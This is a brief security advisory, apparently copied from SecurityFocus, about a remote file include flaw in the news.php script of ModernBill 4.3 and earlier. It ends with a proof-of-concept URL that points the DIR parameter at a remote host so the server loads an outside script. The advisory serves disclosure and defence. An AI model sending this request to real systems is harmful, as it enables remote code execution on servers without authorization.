9 lines
No EOL
403 B
Text
9 lines
No EOL
403 B
Text
source: http://www.securityfocus.com/bid/13086/info
|
|
|
|
ModernBill is prone to a remote file include vulnerability.
|
|
|
|
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'news.php' script.
|
|
|
|
ModernBill 4.3 and prior versions are vulnerable to this issue.
|
|
|
|
http://www.example.com/samples/news.php?DIR=http://www.example.com/ |